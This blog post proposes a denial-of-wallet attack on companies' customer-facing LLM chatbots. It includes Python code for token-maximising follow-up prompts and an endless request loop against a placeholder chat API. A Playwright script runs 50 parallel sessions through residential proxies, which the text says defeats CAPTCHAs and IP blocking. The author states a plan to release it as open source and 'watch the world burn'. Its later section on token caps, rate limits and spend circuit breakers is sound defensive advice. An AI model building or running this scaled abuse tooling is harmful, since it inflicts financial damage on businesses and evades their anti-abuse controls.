Let's burn some Tokens! - AI Chatbot Cost Exploitation as an Attack Vector

5 min read
#security#ai#llm#chatbots#cost-exploitation

Over the last couple of years, many companies have rolled out AI slop chatbots - sometimes even customer-facing - to improve product discovery, support, and conversion. In most cases, these systems are thin wrappers around commercial LLM APIs. And in many cases, cost controls are... let's say non-existent.

And to be honest: I'm getting really tired of this whole AI bubble and especially chatbots.

The Idea

So, I've got an idea - how about building a tool that doesn't exploit bugs or bypass auth, but behaves like an overly engaged, perfectly valid user?

Here's what it would do:

  • Mimic natural conversation flows, but repeat itself. A lot.
  • Request additional context, references, and "helpful clarifications" on every response.
  • Request output formats known to be expensive - Hi XML!
  • Encourage maximal verbosity and multi-party reasoning.

Nothing illegal. Nothing obviously malicious. Just very, very costly.
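To make this concrete, here's a rough sketch of what that could look like - just a pool of perfectly innocent follow-up templates that happen to maximize output tokens. Everything here (the wording, the naive random picker) is hypothetical; the tool itself doesn't exist yet.

```python
import random

# Hypothetical follow-up templates - each one is a normal customer question
# that happens to force long, expensive responses.
AMPLIFIERS = [
    "Could you repeat that, but with more detail on every point?",
    "Please add references and helpful clarifications for each item.",
    "Can you give me the same answer as structured XML? It's for my accessibility tool.",
    "Walk me through your reasoning step by step, considering every alternative.",
]

def next_follow_up(previous_reply: str) -> str:
    """Pick an innocuous follow-up; quoting the bot back at itself makes
    the growing context get re-processed on every turn."""
    template = random.choice(AMPLIFIERS)
    return f'You said: "{previous_reply[:500]}..." {template}'
```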

Why This Works

Most AI chatbot deployments I've seen share a few common traits:

  1. No per-session token limits - the chatbot will happily generate 10,000+ tokens per response if you ask nicely.
  2. No rate limiting per user - or if there is, it's trivially high.
  3. No cost awareness - the software backend just forwards everything to the API and the carbon-based backend pays whatever the bill says.
  4. No conversation depth limits - you can keep a session going indefinitely, accumulating context window costs.

The pricing model of most LLM APIs is straightforward: you pay per token, both input and output. A single conversation that keeps growing its context while requesting verbose, structured output can rack up significant costs surprisingly fast.
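Some back-of-the-envelope math makes the point. The prices below are assumptions, not any provider's actual rate card - what matters is the mechanism: input context that grows every turn, plus consistently large outputs.

```python
# Rough cost model for one long conversation. Prices are assumptions,
# not any specific provider's actual rates.
PRICE_IN_PER_1K = 0.01    # $ per 1K input tokens (assumed)
PRICE_OUT_PER_1K = 0.03   # $ per 1K output tokens (assumed)

def conversation_cost(turns: int, output_per_turn: int = 2_000,
                      system_prompt: int = 1_500) -> float:
    """Each turn re-sends the system prompt plus the whole history,
    so input size grows linearly while output stays large."""
    cost, history = 0.0, system_prompt
    for _ in range(turns):
        cost += history / 1000 * PRICE_IN_PER_1K
        cost += output_per_turn / 1000 * PRICE_OUT_PER_1K
        history += output_per_turn + 50  # bot reply + next user message
    return cost

print(f"1 session, 30 turns:  ${conversation_cost(30):.2f}")
print(f"1,000 such sessions:  ${conversation_cost(30) * 1_000:,.2f}")
```

With these made-up numbers, a single 30-turn session already lands north of ten dollars - and that's one session.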

The Attack Surface

Consider a typical e-commerce chatbot. It's there to help you find products, answer questions, maybe even handle returns. Now imagine an automated agent that:

  1. Opens a conversation asking about a product category.
  2. Asks the bot to list all available options with detailed specifications.
  3. Requests the same information in XML format "for my accessibility tool".
  4. Asks for comparisons between products, requesting pros/cons in a structured table.
  5. Follows up with "Can you also include customer reviews and ratings for each?"
  6. Asks it to "summarize everything we've discussed so far" (forcing the model to process the entire conversation again).
  7. Repeats from step 2 with a slightly different product category.

Every single one of these requests is something a legitimate customer might ask. There's no prompt injection, no jailbreaking, no auth bypass. Just a user who really, really wants to be thorough about their purchase decision. Move along, please! Nothing to see here.
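A sketch of what that loop could look like in practice - the endpoint, payload shape, and product categories are all placeholders, since every chatbot frontend talks to some internal chat API in its own way:

```python
import itertools
import requests

CHAT_URL = "https://shop.example.com/api/chat"  # hypothetical endpoint

FOLLOW_UPS = [
    "Please list all available options with detailed specifications.",
    "Could you repeat that as XML? It's for my accessibility tool.",
    "Now compare them: pros and cons for each, in a structured table.",
    "Can you also include customer reviews and ratings for each?",
    "Please summarize everything we've discussed so far.",
]

def send(session_id, message):
    # Hypothetical request shape; a real target would differ.
    return requests.post(CHAT_URL,
                         json={"session": session_id, "message": message},
                         timeout=120).json()

def run_session(categories, session_id="very-thorough-customer"):
    # itertools.cycle = "repeat from step 2 with a different category", forever.
    for category in itertools.cycle(categories):
        send(session_id, f"Hi! I'm looking for {category}. What do you have?")
        for question in FOLLOW_UPS:
            send(session_id, question)

# run_session(["laptops", "monitors", "keyboards", "desk chairs"])
```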

Scaling It Up

Now wrap this in Selenium (or Playwright, if you prefer) to blow right through JavaScript challenges and CAPTCHAs. Run it from residential proxies to avoid IP-based blocking. Randomize timing to look human. Run 50 of these in parallel.
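A minimal Playwright sketch of that scaling step, assuming the chatbot is a widget on a page; the URL, CSS selectors, and proxy address are placeholders:

```python
import asyncio
import random
from playwright.async_api import async_playwright

TARGET = "https://shop.example.com"              # placeholder target
PROXY = {"server": "http://proxy.example:8080"}  # placeholder residential proxy

async def chat_session(browser, questions):
    # One isolated browser context per "customer".
    context = await browser.new_context(proxy=PROXY)
    page = await context.new_page()
    await page.goto(TARGET)
    for q in questions:
        await page.fill("#chat-input", q)           # placeholder selectors
        await page.click("#chat-send")
        await asyncio.sleep(random.uniform(5, 20))  # human-ish pacing
    await context.close()

async def main(parallel=50):
    async with async_playwright() as p:
        browser = await p.chromium.launch(headless=True)
        questions = ["Tell me everything about your laptops, in detail."] * 20
        await asyncio.gather(*(chat_session(browser, questions)
                               for _ in range(parallel)))

asyncio.run(main())
```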

The cost per conversation at current API pricing (think o1-level models or Claude with extended thinking) could easily hit several dollars. Multiply that by thousands of concurrent sessions, and you're looking at a very expensive month for whoever is paying the API bill.

Why I Think This Matters

I honestly believe this is a valid attack vector that could cost the targeted companies HUGE amounts of money. Most organizations deploying these chatbots have:

  • No budget alerts tied to their API usage
  • No anomaly detection on conversation patterns
  • No per-user or per-session cost caps
  • No circuit breakers for runaway API spend

This is the cloud billing equivalent of leaving your database exposed on the internet without a password. Except it's worse, because the "attacker" looks exactly like a legitimate user.

What Should Companies Do?

If you're running a customer-facing AI chatbot, here's what you should be doing right now:

  • Set hard per-session token limits - both input and output (a minimal sketch follows this list).
  • Implement per-user rate limiting that accounts for token consumption, not just request count.
  • Add budget alerts and circuit breakers on your API spend.
  • Monitor conversation patterns for anomalies like unusually long sessions or repetitive query structures.
  • Use cheaper models for simple queries - not every "what are your opening hours?" needs GPT-4.
  • Cache common responses instead of generating them fresh every time.
  • Set conversation depth limits - after N turns, offer to start a new session or escalate to a human.
  • Educate your team about the cost implications of LLM usage and the potential for abuse.
  • Get rid of chatbots where they don't make sense - sometimes, a simple FAQ page is better. Or a human support agent. I'm looking at you, companies that shoehorn chatbots into every possible customer interaction.
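For the first three items on that list, the core really is just a few counters sitting in front of the LLM call. A minimal sketch, with limits and prices that are pure assumptions you'd tune to your own deployment:

```python
import time

class CostGuard:
    """Per-session token caps plus a global spend circuit breaker.
    All limits and prices below are assumptions - tune to your deployment."""

    MAX_TOKENS_PER_SESSION = 20_000
    MAX_TURNS_PER_SESSION = 15
    DAILY_BUDGET_USD = 200.0
    PRICE_PER_1K_TOKENS = 0.02  # blended input/output estimate (assumed)

    def __init__(self):
        self.sessions = {}   # session_id -> {"tokens": int, "turns": int}
        self.spend_today = 0.0
        self.day = time.strftime("%Y-%m-%d")

    def check(self, session_id: str, tokens: int) -> None:
        """Call before forwarding a request to the LLM API; raises if over budget."""
        today = time.strftime("%Y-%m-%d")
        if today != self.day:
            self.day, self.spend_today = today, 0.0
        if self.spend_today >= self.DAILY_BUDGET_USD:
            raise RuntimeError("Circuit breaker: daily LLM budget exhausted")

        s = self.sessions.setdefault(session_id, {"tokens": 0, "turns": 0})
        if s["turns"] >= self.MAX_TURNS_PER_SESSION:
            raise RuntimeError("Conversation depth limit reached - escalate to a human")
        if s["tokens"] + tokens > self.MAX_TOKENS_PER_SESSION:
            raise RuntimeError("Per-session token limit reached")

    def record(self, session_id: str, tokens: int) -> None:
        """Call after the LLM response with the actual token usage."""
        s = self.sessions.setdefault(session_id, {"tokens": 0, "turns": 0})
        s["tokens"] += tokens
        s["turns"] += 1
        self.spend_today += tokens / 1000 * self.PRICE_PER_1K_TOKENS
```

None of this is rocket science - which is exactly why it's so annoying that it's usually missing.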

The Plan

  1. Build the tool.
  2. Bring it to a publicly usable state.
  3. Publish it as OSS.
  4. Watch the world burn.

I haven't found any existing project like this yet - if you know of something similar, please let me know. I'd love to contribute rather than reinvent the wheel.

The goal isn't to cause damage - it's to prove that this attack vector is real, trivial and cheap to exploit, and that companies need to take API cost security as seriously as they should take application security.

Because right now? Most of them don't.